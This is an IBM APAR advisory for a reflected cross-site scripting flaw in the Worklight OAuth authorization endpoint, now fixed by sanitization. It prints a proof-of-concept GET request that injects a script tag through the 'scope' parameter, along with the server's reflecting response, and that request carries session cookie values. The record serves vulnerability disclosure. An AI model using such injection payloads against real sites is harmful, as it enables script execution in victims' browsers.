APAR status
Closed as program error.
Error description
In detail the vulnerability is present in the OAuth Server Api EndPoint "authorization/v1/authorization", used by client applications to perform authorization. The vulnerable parameter is "scope", if you set as value a "realm" not defined in authenticationConfig.xml you get a HTTP 403 Forbidden response and the value will be reflected in the body of the HTTP response. Steps to Reproduce Vulnerability: For reproduce the vulnerability is sufficient send a GET request to the OAuth Server Api EndPoint "authorization/v1/authorization" and set the proper payload as a parameter value "scope". Sample PCAP/Proof of Concept/Traces or Description of Exploit/Attack Code: HTTP Request [[ GET /[NOT DISCLOSED]/authorization/v1/authorization?client_id=[NOT DISCLOSED]&scope=-WSAuthRealm%22%3E%3Cscript%3Ealert(1)%3C/scrip t%3E&isAjaxRequest=true&x=0.7680186943616718 HTTP/1.1 Host: [NOT DISCLOSED] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=258156760.1680166455663768300.1471870420.1472114198.14721 18485.5; __utmz=258156760.1471870420.1.1.utmcsr=(direct)|utmccn=(direct)| utmcmd=(none); JSESSIONID=0000VsB3f4RmIr2S8WS2iJr-E5G:13c24b52-ac63-4c87-89c5-7 ecd12c481f3; citrix_ns_id=iJ29MbqK2oFYiA5vZ6lhuRw4pXcA000 Connection: close ]] HTTP Response [[ HTTP/1.1 403 Forbidden X-Powered-By: Servlet/3.0 Content-Type: text/html Connection: Close Date: Mon, 29 Aug 2016 16:13:37 GMT Strict-Transport-Security: max-age=157680000 X-Expires-Orig: None Cache-Control: max-age=0, must-revalidate, private Content-Length: 109 Logout failed: The realm 'WSAuthRealm"><script>alert(1)</script>' is not defined in authenticationConfig.xml. ]]
Local fix
Problem summary
**************************************************************** * USERS AFFECTED: * * None in particular, low severity vulnerability * **************************************************************** * PROBLEM DESCRIPTION: * * The realm name provided in the logout operation is not * * properly sanitized when printing it back as an error * * response. * **************************************************************** * RECOMMENDATION: * ****************************************************************
Problem conclusion
Sanitization added.
Temporary fix
Comments
APAR Information
APAR number
PI71750
Reported component name
MOBILE1ST PLATF
Reported component ID
5725I4301
Reported release
710
Status
CLOSED PER
PE
NoPE
HIPER
NoHIPER
Special Attention
NoSpecatt / Xsystem
Submitted date
2016-11-03
Closed date
2017-07-04
Last modified date
2017-07-04
APAR is sysrouted FROM one or more of the following:
APAR is sysrouted TO one or more of the following:
Fix information
Fixed component name
MOBILE1ST PLATF
Fixed component ID
5725I4301
Applicable component levels
R710 PSY
UP
R800 PSY
UP
[{"Business Unit":{"code":"BU053","label":"Cloud & Data Platform"},"Product":{"code":"SSZH4A","label":"IBM Worklight"},"Component":"","ARM Category":[],"Platform":[{"code":"PF025","label":"Platform Independent"}],"Version":"710","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}]
Document Information
Modified date:
04 July 2017